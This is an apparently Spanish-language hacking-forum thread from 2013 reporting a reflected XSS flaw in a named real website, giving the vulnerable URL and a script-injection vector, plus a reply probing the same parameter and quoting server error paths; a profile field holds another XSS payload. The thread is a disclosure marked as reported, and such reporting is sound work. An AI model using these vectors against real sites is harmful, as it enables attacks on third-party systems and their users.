[Reflected XSS] Nilswogram.com

  • 2 Respuestas
  • 1531 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado F0M3T

  • *
  • Ex-Staff
  • *****
  • Mensajes: 177
  • Actividad:
    0%
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
    • f0m3t blogsgsgsgsdfñsadf

[Reflected XSS] Nilswogram.com

  • en: Abril 07, 2013, 09:40:07 pm
Url: http://www.nilswogram.com
Url afectado: http://www.nilswogram.com/public/gallery.php?id=5
Vector: "><script>alert(/F0M3T - UNDERC[0]DE/);</script>
Imagen:


Reportado: Sí.

« Última modificación: Enero 08, 2015, 02:34:27 pm por Expermicid »

Esto no se trata de ganar, se trata de no perder.

Desconectado Jimeno

  • *
  • Ex-Staff
  • *****
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Skype: migueljimeno96
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
    • Ver Perfil
    • Twitter

Re:[Reflected XSS] Nilswogram.com

  • en: Abril 08, 2013, 10:10:37 am
Creo que también tenga SQLi, mira:
 URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
Citar
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Contacto: @migueljimeno96 -

Desconectado F0M3T

  • *
  • Ex-Staff
  • *****
  • Mensajes: 177
  • Actividad:
    0%
  • Reputación 0
  • Antes de empezar, mira el lienzo...
    • Ver Perfil
    • f0m3t blogsgsgsgsdfñsadf

Re:[Reflected XSS] Nilswogram.com

  • en: Abril 08, 2013, 05:15:25 pm
Creo que también tenga SQLi, mira:
 URL: http://www.nilswogram.com/public/gallery.php?id=%27
Respuesta:
Citar
Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include(gallery/\'.html) [function.include]: failed to open stream: No such file or directory in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Warning: include() [function.include]: Failed opening 'gallery/\'.html' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /home/httpd/vhosts/nilswogram.com/httpdocs/public/gallery.php on line 39

Compruébalo por favor y repórtalo si eso...
Saludos ((:
Sí me percaté de esa vulnerabilidad, pero no se puede explotar, gracias por la aclaración.
Saludos.

Esto no se trata de ganar, se trata de no perder.

 

Reflected XSS San Francisco Chronicle (Importante Diario de San Francisco)

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2162
Último mensaje Agosto 31, 2012, 08:37:25 pm
por hdbreaker
XSS Reflected Error Based "Aerolineas Argentinas"

Iniciado por q3rv0

Respuestas: 3
Vistas: 3779
Último mensaje Septiembre 02, 2012, 04:46:33 pm
por ANTRAX
XSS Reflected clarin.com (El diario mas polemico de la argentina)

Iniciado por q3rv0

Respuestas: 8
Vistas: 4509
Último mensaje Febrero 02, 2013, 03:01:40 pm
por Tulkalex
XSS Reflected Quicksilver Brasil

Iniciado por q3rv0

Respuestas: 0
Vistas: 2381
Último mensaje Septiembre 09, 2012, 02:11:37 am
por q3rv0
XSS reflected http://iphoneapplicationlist.com

Iniciado por q3rv0

Respuestas: 0
Vistas: 1723
Último mensaje Febrero 21, 2013, 02:57:18 pm
por q3rv0